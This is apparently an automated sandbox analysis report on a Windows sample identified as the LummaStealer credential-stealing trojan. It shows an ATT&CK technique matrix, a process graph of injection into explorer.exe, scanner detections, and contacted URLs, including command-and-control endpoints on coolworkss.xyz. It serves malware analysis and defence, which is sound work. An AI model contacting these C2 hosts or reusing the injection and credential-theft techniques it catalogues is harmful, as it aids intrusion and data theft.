            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7020, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts22
            Native API
            1
            DLL Side-Loading
            412
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services11
            Archive Collected Data
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            12
            Virtualization/Sandbox Evasion
            LSASS Memory221
            Security Software Discovery
            Remote Desktop Protocol21
            Data from Local System
            Exfiltration Over Bluetooth2
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)412
            Process Injection
            Security Account Manager12
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Deobfuscate/Decode Files or Information
            NTDS12
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer14
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Software Packing
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            DLL Side-Loading
            DCSync11
            File and Directory Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem232
            System Information Discovery
            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1303447 Sample: lJ2eYRm0Bd.exe Startdate: 05/09/2023 Architecture: WINDOWS Score: 100 28 coolworkss.xyz 2->28 44 Snort IDS alert for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 7 other signatures 2->50 8 lJ2eYRm0Bd.exe 4 2->8         started        signatures3 process4 dnsIp5 30 ipv4.imgur.map.fastly.net 199.232.32.193, 443, 49719 FASTLYUS United States 8->30 32 wwf.org 104.18.6.142, 443, 49717 CLOUDFLARENETUS United States 8->32 34 2 other IPs or domains 8->34 52 Writes to foreign memory regions 8->52 54 Maps a DLL or memory area into another process 8->54 12 cmd.exe 2 8->12         started        signatures6 process7 file8 22 C:\Users\user\AppData\Local\Temp\kheeknpom, PE32 12->22 dropped 56 Injects code into the Windows Explorer (explorer.exe) 12->56 58 Writes to foreign memory regions 12->58 60 Found hidden mapped module (file has been removed from disk) 12->60 62 Maps a DLL or memory area into another process 12->62 16 explorer.exe 12 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 24 104.21.60.111, 49740, 49744, 49745 CLOUDFLARENETUS United States 16->24 26 coolworkss.xyz 172.67.195.229, 49737, 49738, 49739 CLOUDFLARENETUS United States 16->26 36 System process connects to network (likely due to code injection or exploit) 16->36 38 Query firmware table information (likely to detect VMs) 16->38 40 Performs DNS queries to domains with low reputation 16->40 42 4 other signatures 16->42 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            lJ2eYRm0Bd.exe21%ReversingLabsWin64.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\kheeknpom100%AviraTR/Spy.Agent.elwjq
            C:\Users\user\AppData\Local\Temp\kheeknpom100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\kheeknpom83%ReversingLabsWin32.Trojan.LummaStealer
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html0%URL Reputationsafe
            http://mths.be/punycode0%URL Reputationsafe
            http://foo.com0%URL Reputationsafe
            http://coolworkss.xyz/r100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sockO100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sock_100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sock?100%Avira URL Cloudphishing
            http://crl3.digicert.co(m/D0%Avira URL Cloudsafe
            http://coolworkss.xyz/44s100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sock100%Avira URL Cloudphishing
            http://coolworkss.xyz:80/c2socka100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sock/100%Avira URL Cloudphishing
            http://coolworkss.xyz/c2sock3100%Avira URL Cloudmalware
            http://coolworkss.xyz:80/c2sock100%Avira URL Cloudphishing
            http://narwhaljs.org)0%Avira URL Cloudsafe
            http://coolworkss.xyz/5100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sock:100%Avira URL Cloudmalware
            http://coolworkss.xyz/U100%Avira URL Cloudmalware
            https://wwf.org0%Avira URL Cloudsafe
            http://c0rl.m%L0%Avira URL Cloudsafe
            https://wwf.org/0%Avira URL Cloudsafe
            http://coolworkss.xyz/yO3GNZ100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2conf100%Avira URL Cloudphishing
            https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb5954150%Avira URL Cloudsafe
            http://coolworkss.xyz/100%Avira URL Cloudmalware
            http://coolworkss.xyz:80/c2sock;100%Avira URL Cloudphishing
            http://coolworkss.xyz/c2sockw100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2sockt100%Avira URL Cloudmalware
            http://coolworkss.xyz/c2socky100%Avira URL Cloudmalware
            http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeouts0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.worldwildlife.org
            104.18.6.94
            truefalse
              high
              wwf.org
              104.18.6.142
              truefalse
                unknown
                coolworkss.xyz
                172.67.195.229
                truetrue
                  unknown
                  ipv4.imgur.map.fastly.net
                  199.232.32.193
                  truefalse
                    unknown
                    i.imgur.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://wwf.org/false
                      • Avira URL Cloud: safe
                      unknown
                      http://coolworkss.xyz/c2socktrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.orgfalse
                        high
                        https://i.imgur.com/2lsHcHC.pngfalse
                          high
                          http://coolworkss.xyz/true
                          • Avira URL Cloud: malware
                          unknown
                          http://coolworkss.xyz/c2conftrue
                          • Avira URL Cloud: phishing
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://coolworkss.xyz/c2sock_explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://duckduckgo.com/chrome_newtabexplorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://insanecoding.blogspot.com/2007/11/pathmax-simply-isnt.htmllJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://i.imgur.com/2lsHcHC.png;https://i.ibb.co/93gBLW7/1552130165.pnglJ2eYRm0Bd.exe, 00000000.00000003.217524808.0000000000600000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://i.imgur.com/2lsHcHC.pngelJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/joyent/node/issues/3295.lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.vmware.com/0lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://wwf.orglJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://coolworkss.xyz/rexplorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://nodejs.org/lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/joyent/node/issues/1726lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://coolworkss.xyz:80/c2sockaexplorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://daniel.haxx.se/blog/2011/02/21/localhost-hack-on-windows/lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.worldwildlife.org/pages/state-disclosureslJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://coolworkss.xyz/44sexplorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.ecma-international.org/publications/standards/Ecma-262.htm)lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://code.google.com/p/v8/wiki/DebuggerProtocollJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl3.digicert.co(m/DlJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    https://search.yahoo.com?fr=crmas_sfpfexplorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://coolworkss.xyz/c2sockOexplorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.htmllJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.worldwildlife.org/storieslJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/search?q=.netexplorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.worldwildlife.org/about/lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.openssl.org/support/faq.htmllJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmpfalse
                                                              high
                                                              http://invisible-island.net/xterm/ctlseqs/ctlseqs.htmllJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.comexplorer.exe, 00000013.00000002.455198443.0000000003388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.worldwildlife.org/pages/privacy-policylJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://coolworkss.xyz/c2sock?explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    https://fca7603378a4e3ebeab2-4e03b1ac88f27f7b20b4cf232f717383.ssl.cf1.rackcdn.com/photos/social/landlJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.worldwildlife.org/about/historylJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.worldwildlife.org/leaderslJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://wiki.commonjs.org/wiki/Unit_Testing/1.0lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://coolworkss.xyz/c2sock/explorer.exe, 00000013.00000003.353007918.0000000003388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: phishing
                                                                            unknown
                                                                            https://www.worldwildlife.org/about/contactlJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://groups.google.com/forum/?pli=1#lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.nexplorer.exe, 00000013.00000002.455599716.0000000005CAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://coolworkss.xyz/c2sock:explorer.exe, 00000013.00000002.455198443.000000000333D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://mathiasbynens.be/notes/javascript-encodinglJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://coolworkss.xyz/c2sock3explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://coolworkss.xyz:80/c2sockexplorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    unknown
                                                                                    https://github.com/joyent/node/issues/2631lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://coolworkss.xyz/5explorer.exe, 00000013.00000002.455198443.000000000334B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3FlJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/joyent/node/issues/1707lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://stackoverflow.com/a/5501711/3561lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.midnight-commander.org/browser/lib/tty/key.clJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.squid-cache.org/Doc/config/half_closed_clients/lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.worldwildlife.org/clJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.vmware.com/0/lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.worldwildlife.org/lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://rustih.ru/wp-content/uploads/2015/explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://c0rl.m%LlJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            http://www.symauth.com/cps0(lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://narwhaljs.org)lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://tools.ietf.org/html/rfc3492#section-3.4lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/favicon.icoexplorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://coolworkss.xyz/Uexplorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://search.yahoo.com?fr=crmas_sfpexplorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://code.google.com/p/chromium/issues/detail?id=25916lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://codereview.chromium.org/121173009/lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://coolworkss.xyz:80/c2sock;explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                            unknown
                                                                                                                            https://www.worldwildlife.org/pages/lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://coolworkss.xyz/yO3GNZexplorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://www.thawte.com/cps0/lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://mths.be/punycodelJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.symauth.com/rpa00lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
